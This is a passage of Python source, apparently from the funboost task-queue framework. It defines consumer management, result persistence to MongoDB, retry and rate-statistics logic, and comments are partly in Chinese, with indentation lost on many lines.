self.logger.info(f"函数运行状态结果将保存至mongo的 task_status 库的 {queue_name} 集合中,请确认 funboost.py文件中配置的 MONGO_CONNECT_URL")
def save_function_result_to_mongo(self, function_result_status: FunctionResultStatus):
if self.function_result_status_persistance_conf.is_save_status:
item = function_result_status.get_status_dict()
item2 = copy.copy(item)
if not self.function_result_status_persistance_conf.is_save_result:
                item2['result'] = 'result not saved'
if item2['result'] is None:
item2['result'] = ''
if item2['exception'] is None:
item2['exception'] = ''
if self.function_result_status_persistance_conf.is_use_bulk_insert:
                # self._mongo_bulk_write_helper.add_task(InsertOne(item2))  # Automatic scattered bulk-aggregation approach.
with self._bulk_list_lock:
self._bulk_list.append(InsertOne(item2))
if time.time() - self._last_bulk_insert_time > 0.5:
self.task_status_col.bulk_write(self._bulk_list, ordered=False)
self._bulk_list.clear()
self._last_bulk_insert_time = time.time()
else:
                self.task_status_col.insert_one(item2)  # Insert immediately, in real time.
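# A minimal illustrative sketch (not part of the original module) of how a consumer wires up the persistence helper.
# The positional arguments of FunctionResultStatusPersistanceConfig follow the call seen in AbstractConsumer.__init__
# (is_save_status, is_save_result, expire_seconds); running it for real requires a reachable MongoDB configured via MONGO_CONNECT_URL.
def _demo_result_persistence():  # pragma: no cover - illustrative only
    persistance_conf = FunctionResultStatusPersistanceConfig(True, True, 7 * 24 * 3600)
    helper = ResultPersistenceHelper(persistance_conf, queue_name='demo_queue')
    status = FunctionResultStatus('demo_queue', 'demo_function', {'x': 1, 'extra': {'task_id': 'demo-task-id'}})
    status.result, status.success = 2, True
    helper.save_function_result_to_mongo(status)  # Inserts (or bulk-inserts) one status document into the demo_queue collection.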
class ConsumersManager:
schedulal_thread_to_be_join = []
consumers_queue__info_map = dict()
consumers_queue__consumer_obj_map = dict()
global_concurrent_mode = None
schedual_task_always_use_thread = False
_has_show_conusmers_info = False
@classmethod
def join_all_consumer_shedual_task_thread(cls):
"""实现这个主要是为了兼容linux和win,在开启多进程时候兼容。在linux下如果子进程中即使有在一个非守护线程里面运行while 1的逻辑,代码也会很快结束。所以必须把所有循环拉取消息的线程join
否则如果只是为了兼容win,压根不需要这里多此一举
"""
# nb_print((cls.schedulal_thread_to_be_join, len(cls.schedulal_thread_to_be_join), '模式:', cls.global_concurrent_mode))
if cls.schedual_task_always_use_thread:
for t in cls.schedulal_thread_to_be_join:
nb_print(t)
t.join()
else:
if cls.global_concurrent_mode in [ConcurrentModeEnum.THREADING, ConcurrentModeEnum.ASYNC, ]:
for t in cls.schedulal_thread_to_be_join:
# nb_print(t)
t.join()
elif cls.global_concurrent_mode == ConcurrentModeEnum.GEVENT:
# cls.logger.info()
# nb_print(cls.schedulal_thread_to_be_join)
gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
elif cls.global_concurrent_mode == ConcurrentModeEnum.EVENTLET:
for g in cls.schedulal_thread_to_be_join:
# eventlet.greenthread.GreenThread.
# nb_print(g)
g.wait()
@classmethod
def show_all_consumer_info(cls):
        # nb_print(f'All consumer info in the current interpreter:\n {cls.consumers_queue__info_map}')
        # if only_print_on_main_process(f'All consumer info in the current interpreter:\n {json.dumps(cls.consumers_queue__info_map, indent=4, ensure_ascii=False)}'):
if not cls._has_show_conusmers_info:
for _, consumer_info in cls.consumers_queue__info_map.items():
                stdout_write(f'{time.strftime("%H:%M:%S")} "{consumer_info["where_to_instantiate"]}" '
                             f' \033[0;30;44mconsumer of queue {consumer_info["queue_name"]}\033[0m\n')
cls._has_show_conusmers_info = True
@staticmethod
def get_concurrent_name_by_concurrent_mode(concurrent_mode):
if concurrent_mode == ConcurrentModeEnum.THREADING:
return 'thread'
elif concurrent_mode == ConcurrentModeEnum.GEVENT:
return 'gevent'
elif concurrent_mode == ConcurrentModeEnum.EVENTLET:
return 'evenlet'
elif concurrent_mode == ConcurrentModeEnum.ASYNC:
return 'async'
elif concurrent_mode == ConcurrentModeEnum.SINGLE_THREAD:
return 'single_thread'
# elif concurrent_mode == ConcurrentModeEnum.LINUX_FORK:
# return 'linux_fork'
# noinspection DuplicatedCode
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
time_interval_for_check_do_not_run_time = 60
BROKER_KIND = None
    BROKER_EXCLUSIVE_CONFIG_KEYS = []  # Broker-specific configuration keys supported by this broker, e.g. kafka supports consumer groups and consuming
    # from the earliest or the latest offset. Because some 30 brokers with differing concepts are supported, users can pass
    # configuration that only makes sense for a particular broker through broker_exclusive_config.
@property
@decorators.synchronized
def publisher_of_same_queue(self):
if not self._publisher_of_same_queue:
self._publisher_of_same_queue = get_publisher(self._queue_name, consuming_function=self.consuming_function,
broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
is_add_file_handler=self._create_logger_file,broker_exclusive_config=self.broker_exclusive_config)
if self._msg_expire_senconds:
self._publisher_of_same_queue.set_is_add_publish_time()
return self._publisher_of_same_queue
def bulid_a_new_publisher_of_same_queue(self):
return get_publisher(self._queue_name, consuming_function=self.consuming_function,
broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
is_add_file_handler=self._create_logger_file,broker_exclusive_config=self.broker_exclusive_config)
@classmethod
def join_shedual_task_thread(cls):
"""
:return:
"""
ConsumersManager.join_all_consumer_shedual_task_thread()
# noinspection PyProtectedMember,PyUnresolvedReferences
def __init__(self, queue_name, *, consuming_function: Callable = None,
consumin_function_decorator: typing.Callable = None, function_timeout=0, concurrent_num=50,
specify_concurrent_pool=None, specify_async_loop=None, concurrent_mode=ConcurrentModeEnum.THREADING,
max_retry_times=3, log_level=10, is_print_detail_exception=True, is_show_message_get_from_broker=False,
qps: float = 0, is_using_distributed_frequency_control=False,
msg_expire_senconds=0, is_send_consumer_hearbeat_to_redis=False,
logger_prefix='', create_logger_file=True, do_task_filtering=False,
task_filtering_expire_seconds=0,
is_do_not_run_by_specify_time_effect=False,
do_not_run_by_specify_time=('10:00:00', '22:00:00'),
schedule_tasks_on_main_thread=False,
function_result_status_persistance_conf=FunctionResultStatusPersistanceConfig(
False, False, 7 * 24 * 3600),
user_custom_record_process_info_func: typing.Callable = None,
is_using_rpc_mode=False,
broker_exclusive_config: dict = None,
):
"""
:param queue_name:
:param consuming_function: 处理消息的函数。
:param consumin_function_decorator : 函数的装饰器。因为此框架做参数自动转指点,需要获取精准的入参名称,不支持在消费函数上叠加 @ *args **kwargs的装饰器,如果想用装饰器可以这里指定。
:param function_timeout : 超时秒数,函数运行超过这个时间,则自动杀死函数。为0是不限制。
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
:param concurrent_num:并发数量,并发种类由concurrent_mode决定
:param specify_concurrent_pool:使用指定的线程池/携程池,可以多个消费者共使用一个线程池,不为None时候。threads_num失效
:param specify_async_loop:指定的async的loop循环,设置并发模式为async才能起作用。
:param concurrent_mode:并发模式,1线程(ConcurrentModeEnum.THREADING) 2gevent(ConcurrentModeEnum.GEVENT)
3eventlet(ConcurrentModeEnum.EVENTLET) 4 asyncio(ConcurrentModeEnum.ASYNC) 5单线程(ConcurrentModeEnum.SINGLE_THREAD)
:param max_retry_times:
:param log_level: # 这里是设置消费者 发布者日志级别的,如果不想看到很多的细节显示信息,可以设置为 20 (logging.INFO)。
:param is_print_detail_exception:函数出错时候时候显示详细的错误堆栈,占用屏幕太多
:param is_show_message_get_from_broker: 从中间件取出消息时候时候打印显示出来
:param qps:指定1秒内的函数执行次数,例如可以是小数0.01代表每100秒执行一次,也可以是50代表1秒执行50次.为0则不控频。
:param is_using_distributed_frequency_control: 是否使用分布式空频(依赖redis统计消费者数量,然后频率平分),默认只对当前实例化的消费者空频有效。
假如实例化了2个qps为10的使用同一队列名的消费者,并且都启动,则每秒运行次数会达到20。如果使用分布式空频则所有消费者加起来的总运行次数是10。
:param is_send_consumer_hearbeat_to_redis 时候将发布者的心跳发送到redis,有些功能的实现需要统计活跃消费者。因为有的中间件不是真mq。
:param logger_prefix: 日志前缀,可使不同的消费者生成不同的日志
:param create_logger_file : 是否创建文件日志
:param do_task_filtering :是否执行基于函数参数的任务过滤
:param task_filtering_expire_seconds:任务过滤的失效期,为0则永久性过滤任务。例如设置过滤过期时间是1800秒 ,
30分钟前发布过1 + 2 的任务,现在仍然执行,
如果是30分钟以内发布过这个任务,则不执行1 + 2,现在把这个逻辑集成到框架,一般用于接口价格缓存。
:param is_do_not_run_by_specify_time_effect :是否使不运行的时间段生效
:param do_not_run_by_specify_time :不运行的时间段
:param schedule_tasks_on_main_thread :直接在主线程调度任务,意味着不能直接在当前主线程同时开启两个消费者。
:param function_result_status_persistance_conf :配置。是否保存函数的入参,运行结果和运行状态到mongodb。
这一步用于后续的参数追溯,任务统计和web展示,需要安装mongo。
:param user_custom_record_process_info_func 提供一个用户自定义的保存消息处理记录到某个地方例如mysql数据库的函数,函数仅仅接受一个入参,入参类型是 FunctionResultStatus,用户可以打印参数
:param is_using_rpc_mode 是否使用rpc模式,可以在发布端获取消费端的结果回调,但消耗一定性能,使用async_result.result时候会等待阻塞住当前线程。
:param broker_exclusive_config 加上一个不同种类中间件非通用的配置,不同中间件自身独有的配置,不是所有中间件都兼容的配置,因为框架支持30种消息队列,消息队列不仅仅是一般的先进先出queue这么简单的概念,
例如kafka支持消费者组,rabbitmq也支持各种独特概念例如各种ack机制 复杂路由机制,每一种消息队列都有独特的配置参数意义,可以通过这里传递。
执行流程为
1、 实例化消费者类,设置各种控制属性
2、启动 start_consuming_message 启动消费
3、start_consuming_message 中 调用 _shedual_task 从中间件循环取消息
4、 _shedual_task 中调用 _submit_task,将 任务 添加到并发池中并发运行。
5、 函数执行完成后,运行 _confirm_consume , 确认消费。
各种中间件的 取消息、确认消费 单独实现,其他逻辑由于采用了模板模式,自动复用代码。
"""
self.init_params = copy.copy(locals())
self.init_params.pop('self')
self.init_params['broker_kind'] = self.__class__.BROKER_KIND
self.init_params['consuming_function'] = consuming_function
ConsumersManager.consumers_queue__info_map[queue_name] = current_queue__info_dict = copy.copy(self.init_params)
ConsumersManager.consumers_queue__consumer_obj_map[queue_name] = self
current_queue__info_dict['consuming_function'] = str(consuming_function) # consuming_function.__name__
current_queue__info_dict['specify_async_loop'] = str(specify_async_loop)
current_queue__info_dict[
'function_result_status_persistance_conf'] = function_result_status_persistance_conf.to_dict()
current_queue__info_dict['class_name'] = self.__class__.__name__
concurrent_name = ConsumersManager.get_concurrent_name_by_concurrent_mode(concurrent_mode)
current_queue__info_dict['concurrent_mode_name'] = concurrent_name
        # Record the file and line where each consumer in the current interpreter was instantiated, so it can be clicked to jump there.
        # Get the line number at which the calling code instantiated the consumer.
        # Instantiating the class directly and instantiating it via the factory give different instantiation lines; we want to point
        # to the user's code, not to the factory, and not to the boost decorator itself.
        line = sys._getframe(0).f_back.f_lineno
        # Get the file name of the module from which the call was made.
        file_name = sys._getframe(1).f_code.co_filename
if 'consumer_factory.py' in file_name:
line = sys._getframe(1).f_back.f_lineno
file_name = sys._getframe(2).f_code.co_filename
if r'funboost\__init__.py' in file_name or 'funboost/__init__.py' in file_name:
line = sys._getframe(2).f_back.f_lineno
file_name = sys._getframe(3).f_code.co_filename
if r'funboost\helpers.py' in file_name or 'funboost/helpers.py' in file_name:
line = sys._getframe(3).f_back.f_lineno
file_name = sys._getframe(4).f_code.co_filename
current_queue__info_dict['where_to_instantiate'] = f'{file_name}:{line}'
self._queue_name = queue_name
        self.queue_name = queue_name  # Also exposed as a public attribute, so external access does not trigger warnings.
        if consuming_function is None:
            raise ValueError('The consuming_function argument must be provided')
self.consuming_function = consuming_function
self._consumin_function_decorator = consumin_function_decorator
self._function_timeout = function_timeout
        # If qps is set and concurrent_num is left at the default 50, 500 concurrent workers are opened automatically; the smart thread pool
        # does not actually start that many threads when tasks are few and shrinks automatically (see ThreadPoolExecutorShrinkAble).
        # Thanks to the qps rate control and the auto-scaling pool, the framework recommends only tuning qps rather than the concurrency level.
if qps != 0 and concurrent_num == 50:
self._concurrent_num = 500
else:
self._concurrent_num = concurrent_num
self._specify_concurrent_pool = specify_concurrent_pool
self._specify_async_loop = specify_async_loop
self._concurrent_pool = None
self._concurrent_mode = concurrent_mode
self._max_retry_times = max_retry_times
self._is_print_detail_exception = is_print_detail_exception
self._is_show_message_get_from_broker = is_show_message_get_from_broker
self._qps = qps
self._msg_schedule_time_intercal = 0 if qps == 0 else 1.0 / qps
self._is_using_distributed_frequency_control = is_using_distributed_frequency_control
self._is_send_consumer_hearbeat_to_redis = is_send_consumer_hearbeat_to_redis or is_using_distributed_frequency_control
self._msg_expire_senconds = msg_expire_senconds
if self._concurrent_mode not in (1, 2, 3, 4, 5, 6):
            raise ValueError('The configured concurrent mode is invalid')
self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
if self._concurrent_mode == ConcurrentModeEnum.ASYNC:
            self._run = self._async_run  # Automatic switch: _async_run is used in place of _run.
self._logger_prefix = logger_prefix
self._log_level = log_level
if logger_prefix != '':
logger_prefix += '--'
# logger_name = f'{logger_prefix}{self.__class__.__name__}--{concurrent_name}--{queue_name}--{self.consuming_function.__name__}'
logger_name = f'{logger_prefix}{self.__class__.__name__}--{queue_name}'
# nb_print(logger_name)
self._create_logger_file = create_logger_file
self._log_level = log_level
log_file_handler_type = 1
        if int(os.getenv('is_fsdf_remote_run', 0)) == 1:  # Environment variable set automatically by remote deployment; users do not need to set it themselves.
            log_file_handler_type = 5  # When fabric_deploy starts the function remotely via `python -c`, the first file handler type does not write to file, so handler type 5 is used instead.
self.logger = get_logger(logger_name, log_level_int=log_level, log_filename=f'{logger_name}.log' if create_logger_file else None,
log_file_handler_type=log_file_handler_type,
formatter_template=funboost_config_deafult.NB_LOG_FORMATER_INDEX_FOR_CONSUMER_AND_PUBLISHER, )
        # self.logger.info(f'{self.__class__} was instantiated at {current_queue__info_dict["where_to_instantiate"]}')
        stdout_write(f'{time.strftime("%H:%M:%S")} "{current_queue__info_dict["where_to_instantiate"]}" \033[0;37;44mthis line '
                     f'instantiates a consumer for queue {current_queue__info_dict["queue_name"]}, of type {self.__class__}\033[0m\n')
        # only_print_on_main_process(f'consumer configuration for {current_queue__info_dict["queue_name"]}:\n', un_strict_json_dumps.dict2json(current_queue__info_dict))
        if is_main_process:
            self.logger.debug(f'consumer configuration for {current_queue__info_dict["queue_name"]}:\n {un_strict_json_dumps.dict2json(current_queue__info_dict)}')
self._do_task_filtering = do_task_filtering
self._redis_filter_key_name = f'filter_zset:{queue_name}' if task_filtering_expire_seconds else f'filter_set:{queue_name}'
filter_class = RedisFilter if task_filtering_expire_seconds == 0 else RedisImpermanencyFilter
self._redis_filter = filter_class(self._redis_filter_key_name, task_filtering_expire_seconds)
        self._unit_time_for_count = 10  # Counting interval in seconds for reporting how many runs happen per unit of time; fixed at 10 seconds for now.
        self._execute_task_times_every_unit_time = 0  # How many tasks were executed in the current unit of time.
self._lock_for_count_execute_task_times_every_unit_time = Lock()
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
        self._last_execute_task_time = time.time()  # Time when a task was last executed.
self._msg_num_in_broker = 0
self._last_timestamp_when_has_task_in_queue = 0
self._last_timestamp_print_msg_num = 0
self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
        self._do_not_run_by_specify_time = do_not_run_by_specify_time  # A time window during which the consumer does not run can be configured.
self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
self._result_persistence_helper = ResultPersistenceHelper(function_result_status_persistance_conf, queue_name)
self._user_custom_record_process_info_func = user_custom_record_process_info_func
self._is_using_rpc_mode = is_using_rpc_mode
if broker_exclusive_config is None:
broker_exclusive_config = {}
self.broker_exclusive_config = broker_exclusive_config
self._stop_flag = None
        self._pause_flag = None  # Pause-consumption flag, read from redis.
self._last_show_pause_log_time = 0
self._redis_key_stop_flag = f'funboost_stop_flag:{self.queue_name}'
self._redis_key_pause_flag = f'funboost_pause_flag:{self.queue_name}'
        # Instance attributes used for rate control.
self._last_submit_task_timestamp = 0
self._last_start_count_qps_timestamp = time.time()
self._has_execute_times_in_recent_second = 0
self._publisher_of_same_queue = None
self.consumer_identification = f'{nb_log_config_default.computer_name}_{nb_log_config_default.computer_ip}_' \
f'{time_util.DatetimeConverter().datetime_str.replace(":", "-")}_{os.getpid()}_{id(self)}'
self.consumer_identification_map = {'queue_name': self.queue_name,
'computer_name': nb_log_config_default.computer_name,
'computer_ip': nb_log_config_default.computer_ip,
'process_id': os.getpid(),
'consumer_id': id(self),
'consumer_uuid': str(uuid.uuid4()),
'start_datetime_str': time_util.DatetimeConverter().datetime_str,
'start_timestamp': time.time(),
'hearbeat_datetime_str': time_util.DatetimeConverter().datetime_str,
'hearbeat_timestamp': time.time(),
'consuming_function': self.consuming_function.__name__,
'code_filename': Path(self.consuming_function.__code__.co_filename).as_posix()
}
self._delay_task_scheduler = BackgroundScheduler(timezone=funboost_config_deafult.TIMEZONE)
        self._delay_task_scheduler.add_executor(ApschedulerThreadPoolExecutor(2))  # It only submits tasks to the concurrency pool, so few threads are needed.
self._delay_task_scheduler.add_listener(self._apscheduler_job_miss, EVENT_JOB_MISSED)
self._delay_task_scheduler.start()
self._check_broker_exclusive_config()
self.custom_init()
atexit.register(self.join_shedual_task_thread)
def _check_broker_exclusive_config(self):
if self.broker_exclusive_config:
if set(self.broker_exclusive_config.keys()).issubset(self.BROKER_EXCLUSIVE_CONFIG_KEYS):
                self.logger.info(f'The current broker supports these broker-specific configuration keys: {self.broker_exclusive_config.keys()}')
            else:
                self.logger.warning(f'The current broker was given unsupported broker-specific configuration {self.broker_exclusive_config.keys()}; the supported keys are {self.BROKER_EXCLUSIVE_CONFIG_KEYS}')
def _check_monkey_patch(self):
if self._concurrent_mode == 2:
check_gevent_monkey_patch()
elif self._concurrent_mode == 3:
check_evenlet_monkey_patch()
else:
check_not_monkey()
@property
@decorators.synchronized
def concurrent_pool(self):
return self._concurrent_mode_dispatcher.build_pool()
def custom_init(self):
pass
def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True,
block=True):
"""间隔一段时间,一直循环运行某个方法的装饰器
:param time_sleep :循环的间隔时间
:param is_display_detail_exception
:param exit_if_function_run_sucsess :如果成功了就退出循环
:param block:是否阻塞在当前主线程运行。
"""
def _keep_circulating(func):
@wraps(func)
def __keep_circulating(*args, **kwargs):
# noinspection PyBroadException
def ___keep_circulating():
while 1:
if self._stop_flag == 1:
break
try:
result = func(*args, **kwargs)
if exit_if_function_run_sucsess:
return result
except Exception as e:
                            msg = func.__name__ + ' raised an error\n ' + traceback.format_exc(
                                limit=10) if is_display_detail_exception else str(e)
self.logger.exception(msg)
finally:
time.sleep(time_sleep)
if block:
return ___keep_circulating()
else:
threading.Thread(target=___keep_circulating, ).start()
return __keep_circulating
return _keep_circulating
# noinspection PyAttributeOutsideInit
def start_consuming_message(self):
ConsumersManager.show_all_consumer_info()
# noinspection PyBroadException
try:
self._concurrent_mode_dispatcher.check_all_concurrent_mode()
self._check_monkey_patch()
except Exception:
traceback.print_exc()
os._exit(4444) # noqa
        self.logger.warning(f'Starting to consume messages from {self._queue_name}')
self._distributed_consumer_statistics = DistributedConsumerStatistics(self)
if self._is_send_consumer_hearbeat_to_redis:
self._distributed_consumer_statistics.run()
            self.logger.warning(f'Distributed mode enabled: the redis key hearbeat:{self._queue_name} is used to count active consumers; the unique id of this consumer is {self.consumer_identification}')
        self.keep_circulating(10, block=False)(self.check_heartbeat_and_message_count)()  # The interval should be an integer fraction of self._unit_time_for_count, otherwise the logged figures are inaccurate.
        if self._do_task_filtering:
            self._redis_filter.delete_expire_filter_task_cycle()  # By default this is the RedisFilter class, whose method is a no-op pass, so other broker modes do not require installing or configuring redis.
if self._schedule_tasks_on_main_thread:
self.keep_circulating(1)(self._shedual_task)()
else:
self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
setattr(funboost_config_deafult, 'has_start_a_consumer_flag', 1)
@abc.abstractmethod
def _shedual_task(self):
"""
        Every subclass must implement this method: it defines how to pull messages from the broker and add the function and its run arguments to the worker pool.
:return:
"""
raise NotImplementedError
def _print_message_get_from_broker(self, broker_name, msg):
if isinstance(msg, (dict, list)):
msg = json.dumps(msg, ensure_ascii=False)
# print(999)
if self._is_show_message_get_from_broker:
            self.logger.debug(f'Message pulled from queue {self._queue_name} of broker {broker_name}: {msg}')
def _get_priority_conf(self, kw: dict, broker_task_config_key: str):
broker_task_config = kw['body'].get('extra', {}).get(broker_task_config_key, None)
if broker_task_config is None:
return getattr(self, f'_{broker_task_config_key}', None)
else:
return broker_task_config
# noinspection PyMethodMayBeStatic
def _get_concurrent_info(self):
concurrent_info = ''
        ''' Affects log length and a tiny bit of performance.
if self._concurrent_mode == 1:
concurrent_info = f'[{threading.current_thread()} {threading.active_count()}]'
elif self._concurrent_mode == 2:
concurrent_info = f'[{gevent.getcurrent()} {threading.active_count()}]'
elif self._concurrent_mode == 3:
# noinspection PyArgumentList
concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
'''
return concurrent_info
def _run(self, kw: dict, ):
# print(kw)
t_start_run_fun = time.time()
max_retry_times = self._get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'], )
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
self._result_persistence_helper.save_function_result_to_mongo(current_function_result_status)
self._confirm_consume(kw)
if self._get_priority_conf(kw, 'do_task_filtering'):
            self._redis_filter.add_a_value(function_only_params)  # After the function succeeds, add the sorted key-value string of its arguments to the redis set.
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
                f'Function {self.consuming_function.__name__} still failed after reaching the maximum retry count {self._get_priority_conf(kw, "max_retry_times")}; the arguments were {function_only_params} ')
if self._get_priority_conf(kw, 'is_using_rpc_mode'):
# print(function_result_status.get_status_dict(without_datetime_obj=
with RedisMixin().redis_db_filter_and_rpc_result.pipeline() as p:
# RedisMixin().redis_db_frame.lpush(kw['body']['extra']['task_id'], json.dumps(function_result_status.get_status_dict(without_datetime_obj=True)))
# RedisMixin().redis_db_frame.expire(kw['body']['extra']['task_id'], 600)
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
with self._lock_for_count_execute_task_times_every_unit_time:
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
                msg = f'Executed function [ {self.consuming_function.__name__} ] {self._execute_task_times_every_unit_time} times in the last {self._unit_time_for_count} seconds, ' \
                      f'with an average run time of {avarage_function_spend_time} seconds'
                if self._msg_num_in_broker != -1:  # Brokers that cannot (or do not) report the remaining queue size uniformly return -1, in which case this sentence is not shown.
                    # msg += f''' ; an estimated {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} is still needed to finish the {self._msg_num_in_broker} remaining tasks'''
                    need_time = time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) /
                                                                        self._distributed_consumer_statistics.active_consumer_num)
                    msg += f''' ; an estimated {need_time}''' + \
                           f''' is still needed to finish the {self._msg_num_in_broker} remaining tasks'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
if self._user_custom_record_process_info_func:
self._user_custom_record_process_info_func(current_function_result_status)
def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
t_start = time.time()
function_result_status.run_times = current_retry_times + 1
try:
function_timeout = self._get_priority_conf(kw, 'function_timeout')
function_run0 = self.consuming_function if self._consumin_function_decorator is None else self._consumin_function_decorator(self.consuming_function)
function_run = function_run0 if not function_timeout else self._concurrent_mode_dispatcher.timeout_deco(
function_timeout)(function_run0)
function_result_status.result = function_run(**function_only_params)
if asyncio.iscoroutine(function_result_status.result):
                self.logger.critical(f'An async coroutine consuming function must run with the async concurrency mode; please set '
                                     f'concurrent_mode of the consuming function {self.consuming_function.__name__} to ConcurrentModeEnum.ASYNC or 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(4)
function_result_status.success = True
if self._log_level <= logging.DEBUG:
                result_str_to_be_print = str(function_result_status.result)[:100] if len(str(function_result_status.result)) < 100 else str(function_result_status.result)[:100] + ' ..... '
                self.logger.debug(f'Function {self.consuming_function.__name__} '
                                  f'run #{current_retry_times + 1} succeeded; it took {round(time.time() - t_start, 4)} seconds, the arguments were {function_only_params} '
                                  f'and the result was {result_str_to_be_print} , {self._get_concurrent_info()} ')
except Exception as e:
if isinstance(e, (PyMongoError,
                              ExceptionForRequeue)):  # Mongo is often unreachable or down during maintenance/backups, or the user deliberately raises an ExceptionForRequeue; in both cases the message is requeued and the configured retry count does not apply.
                self.logger.critical(f'Error {type(e)} {e} occurred in function [{self.consuming_function.__name__}]; the message is being requeued')
                time.sleep(1)  # Avoid a rapid, endless error/requeue/dequeue loop that keeps the cpu and the broker busy.
self._requeue(kw)
function_result_status.has_requeue = True
return function_result_status
            self.logger.error(f'Function {self.consuming_function.__name__} raised an error on run #{current_retry_times + 1}; '
                              f'it took {round(time.time() - t_start, 4)} seconds,\n the arguments were {function_only_params} \n and the cause was {type(e)} {e} ',
exc_info=self._get_priority_conf(kw, 'is_print_detail_exception'))
# traceback.print_exc()
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
async def _async_run(self, kw: dict, ):
# """虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
# 框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
t_start_run_fun = time.time()
max_retry_times = self._get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'], )
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = await self._async_run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body'], ),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
# self._result_persistence_helper.save_function_result_to_mongo(function_result_status)
await simple_run_in_executor(self._result_persistence_helper.save_function_result_to_mongo, current_function_result_status)
await simple_run_in_executor(self._confirm_consume, kw)
if self._get_priority_conf(kw, 'do_task_filtering'):
            # self._redis_filter.add_a_value(function_only_params)  # After the function succeeds, add the sorted key-value string of its arguments to the redis set.
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
                f'Function {self.consuming_function.__name__} still failed after reaching the maximum retry count {self._get_priority_conf(kw, "max_retry_times")}; the arguments were {function_only_params} ')
            # self._confirm_consume(kw)  # Once the error count exceeds the configured retries, acknowledge the message anyway.
if self._get_priority_conf(kw, 'is_using_rpc_mode'):
def push_result():
with RedisMixin().redis_db_filter_and_rpc_result.pipeline() as p:
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
await simple_run_in_executor(push_result)
        # Async execution has no thread-level concurrency, so no lock is needed.
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
            msg = f'Executed function [ {self.consuming_function.__name__} ] {self._execute_task_times_every_unit_time} times in the last {self._unit_time_for_count} seconds, ' \
                  f'with an average run time of {avarage_function_spend_time} seconds'
            if self._msg_num_in_broker != -1:  # Brokers that cannot (or do not) report the remaining queue size uniformly return -1, in which case this sentence is not shown.
                # msg += f''' ; an estimated {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} is still needed to finish the {self._msg_num_in_broker} remaining tasks'''
                need_time = time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) /
                                                                    self._distributed_consumer_statistics.active_consumer_num)
                msg += f''' ; an estimated {need_time}''' + \
                       f''' is still needed to finish the {self._msg_num_in_broker} remaining tasks'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
if self._user_custom_record_process_info_func:
await self._user_custom_record_process_info_func(current_function_result_status)
